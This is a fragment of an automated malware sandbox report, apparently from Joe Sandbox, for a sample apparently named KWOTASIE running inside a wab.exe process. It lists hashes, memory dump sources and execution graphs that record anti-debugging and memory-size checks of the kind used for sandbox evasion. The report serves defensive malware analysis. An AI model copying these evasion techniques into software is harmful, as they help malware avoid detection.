              • Opcode Fuzzy Hash: ce420ed133ef401578f7edf27e8b1e41d4059e21aeef7803f585746dd391eaaa
              • Instruction Fuzzy Hash: F7D05EB2401920DAC3126704DC04DAF73A8EF12300746446AF841A6165D7786D818AAC
              APIs
              • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F8C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CB3
              • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405CCB
              • CharNextA.USER32(00000000,?,00000000,00405F8C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CDC
              • lstrlenA.KERNEL32(00000000,?,00000000,00405F8C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CE5
              Memory Dump Source
              • Source File: 00000000.00000002.2039766709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2039747567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039784700.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2039833439.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2040173938.00000000004A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_KWOTASIE.jbxd
              Similarity
              • API ID: lstrlen$CharNextlstrcmpi
              • String ID:
              • API String ID: 190613189-0
              • Opcode ID: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
              • Instruction ID: b35bc10bc40a781af4b0b0b13ea0e0b48c2ad23c6ba402853768862ad0a65ea6
              • Opcode Fuzzy Hash: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
              • Instruction Fuzzy Hash: 2CF0F631204918FFDB02DFA4CD4099FBBA8EF06350B2540BAE841FB311D634DE01ABA8

              Execution Graph

              Execution Coverage:11.5%
              Dynamic/Decrypted Code Coverage:100%
              Signature Coverage:8.8%
              Total number of Nodes:34
              Total number of Limit Nodes:5
              execution_graph 10750 3370a0 10751 3370e4 CheckRemoteDebuggerPresent 10750->10751 10752 337126 10751->10752 10753 33f0c0 10757 33f0e9 10753->10757 10768 33f0f8 10753->10768 10754 33f0ce 10758 33f105 10757->10758 10759 33f12d 10757->10759 10758->10754 10764 33f0e9 3 API calls 10759->10764 10765 33f0f8 3 API calls 10759->10765 10780 33f1c8 10759->10780 10783 33f188 10759->10783 10760 33f14e 10760->10754 10761 33f14a 10761->10760 10762 33f216 GlobalMemoryStatusEx 10761->10762 10763 33f246 10762->10763 10763->10754 10764->10761 10765->10761 10769 33f105 10768->10769 10770 33f12d 10768->10770 10769->10754 10776 33f0e9 3 API calls 10770->10776 10777 33f0f8 3 API calls 10770->10777 10778 33f188 GlobalMemoryStatusEx 10770->10778 10779 33f1c8 GlobalMemoryStatusEx 10770->10779 10771 33f14e 10771->10754 10772 33f1b3 10772->10754 10773 33f14a 10773->10771 10773->10772 10774 33f216 GlobalMemoryStatusEx 10773->10774 10775 33f246 10774->10775 10775->10754 10776->10773 10777->10773 10778->10773 10779->10773 10781 33f216 GlobalMemoryStatusEx 10780->10781 10782 33f246 10781->10782 10782->10761 10785 33f1a5 10783->10785 10784 33f1b3 10784->10761 10785->10784 10786 33f216 GlobalMemoryStatusEx 10785->10786 10787 33f246 10786->10787 10787->10761

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 792 3370a0-337124 CheckRemoteDebuggerPresent 794 337126-33712c 792->794 795 33712d-337168 792->795 794->795
              APIs
              • CheckRemoteDebuggerPresent.KERNEL32(?,?), ref: 00337117
              Memory Dump Source
              • Source File: 00000006.00000002.3277464001.0000000000330000.00000040.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_330000_wab.jbxd
              Similarity
              • API ID: CheckDebuggerPresentRemote
              • String ID:
              • API String ID: 3662101638-0
              • Opcode ID: 33e8afddffa1bd3cc157d1d27b95be032f4e017a823c0e4be48b1f0e46534dc8
              • Instruction ID: 67d70e9a9882ef981a97e4cd6283d28080f53adef155a50f09eb1bd63bd15ab8
              • Opcode Fuzzy Hash: 33e8afddffa1bd3cc157d1d27b95be032f4e017a823c0e4be48b1f0e46534dc8
              • Instruction Fuzzy Hash: D82128B6C00259CFCB10CF9AD884BEEBBF4EF49310F14845AE455A7251D778A944CF61

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 760 33f0f8-33f103 761 33f105-33f12c 760->761 762 33f12d-33f143 760->762 782 33f145 call 33f0e9 762->782 783 33f145 call 33f0f8 762->783 784 33f145 call 33f188 762->784 785 33f145 call 33f1c8 762->785 765 33f14a-33f14c 766 33f152-33f1b1 765->766 767 33f14e-33f151 765->767 774 33f1b3-33f1b6 766->774 775 33f1b7-33f244 GlobalMemoryStatusEx 766->775 778 33f246-33f24c 775->778 779 33f24d-33f275 775->779 778->779 782->765 783->765 784->765 785->765
              Memory Dump Source
              • Source File: 00000006.00000002.3277464001.0000000000330000.00000040.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_330000_wab.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7a9c0f683203880aad6c0613897c89ffb05b720976c6564af3c3e98e86a01860
              • Instruction ID: 30c97973235e80d336c6b3be6d6437b94206d670a0d5c1b6a7d3ec7e8ab3ccf8
              • Opcode Fuzzy Hash: 7a9c0f683203880aad6c0613897c89ffb05b720976c6564af3c3e98e86a01860
              • Instruction Fuzzy Hash: 42412672E043998FCB05CFAAD8446DEBBF1EF89310F15856AD808E7241DB749985CBD0

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 786 33709a-337124 CheckRemoteDebuggerPresent 788 337126-33712c 786->788 789 33712d-337168 786->789 788->789
              APIs
              • CheckRemoteDebuggerPresent.KERNEL32(?,?), ref: 00337117
              Memory Dump Source
              • Source File: 00000006.00000002.3277464001.0000000000330000.00000040.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_330000_wab.jbxd
              Similarity
              • API ID: CheckDebuggerPresentRemote
              • String ID:
              • API String ID: 3662101638-0
              • Opcode ID: bdb3efb60e71d907b838016a7d7af6c2fe83a30cc6a4b889e57cc4232ea68ff9
              • Instruction ID: 3cd1e1a7322682c2d664df9167371ca10ea77c871c805d43a5f93fcaac6ff45b
              • Opcode Fuzzy Hash: bdb3efb60e71d907b838016a7d7af6c2fe83a30cc6a4b889e57cc4232ea68ff9
              • Instruction Fuzzy Hash: 272124B68002598FCB10CFAAD884BEEBBF4AF49325F14846AE459A7251C7789945CF60

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 798 33f1c8-33f244 GlobalMemoryStatusEx 800 33f246-33f24c 798->800 801 33f24d-33f275 798->801 800->801
              APIs
              • GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0033F237
              Memory Dump Source
              • Source File: 00000006.00000002.3277464001.0000000000330000.00000040.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_330000_wab.jbxd
              Similarity
              • API ID: GlobalMemoryStatus
              • String ID:
              • API String ID: 1890195054-0
              • Opcode ID: 7db866739a56487bc5b5a37d67f8f3b52fa926fc413d7874f30cffb3e58d1bc3
              • Instruction ID: 7ccd1d3fbdb99b39c158c42d5a20a8b731a84beb9ebcc0a2270a3435e64f1331
              • Opcode Fuzzy Hash: 7db866739a56487bc5b5a37d67f8f3b52fa926fc413d7874f30cffb3e58d1bc3
              • Instruction Fuzzy Hash: D411F2B6C00659DBCB10CFAAD544BDEFBB4EF48320F15856AD818A7240D778A945CFA1
              Memory Dump Source
              • Source File: 00000006.00000002.3277197408.000000000030D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0030D000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_30d000_wab.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 6dc4a33513dc9672f5de09583c28dd40d9b5717f378f780db7674a232981f9ca
              • Instruction ID: 87e196e980194191038a3970fc06aee72c24cd8f34b182af5f2b5fb3f20e51ce
              • Opcode Fuzzy Hash: 6dc4a33513dc9672f5de09583c28dd40d9b5717f378f780db7674a232981f9ca
              • Instruction Fuzzy Hash: 2A2134B1604200DFCB16DF94D9D0B26BBA5FB84324F24C56DE80D0B286C33AD807CA62
              Memory Dump Source
              • Source File: 00000006.00000002.3277197408.000000000030D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0030D000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_30d000_wab.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 514af54206d14070911bcb77176ee4a8fbb755271f114173e67c966e1f406a1e
              • Instruction ID: 928ace452f01ef3c4e3c8bdac719f5feebdc0b45e4d4829bdc6c576e4ad9d03a
              • Opcode Fuzzy Hash: 514af54206d14070911bcb77176ee4a8fbb755271f114173e67c966e1f406a1e
              • Instruction Fuzzy Hash: 5311DD75504280CFCB16CF54D9D4B15FFA1FB84314F28C6AED8494B696C33AD84ACB62
              Memory Dump Source
              • Source File: 00000006.00000002.3277464001.0000000000330000.00000040.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_330000_wab.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: cf11b5a0fc70c7984f8b97abd6b01cbef11296de7f3f5a1f3ac0c7204bd221e0
              • Instruction ID: 585dfe7c630eef6af05e8035b6afb07ec06e820647cb13ddb133a03f9279b789
              • Opcode Fuzzy Hash: cf11b5a0fc70c7984f8b97abd6b01cbef11296de7f3f5a1f3ac0c7204bd221e0
              • Instruction Fuzzy Hash: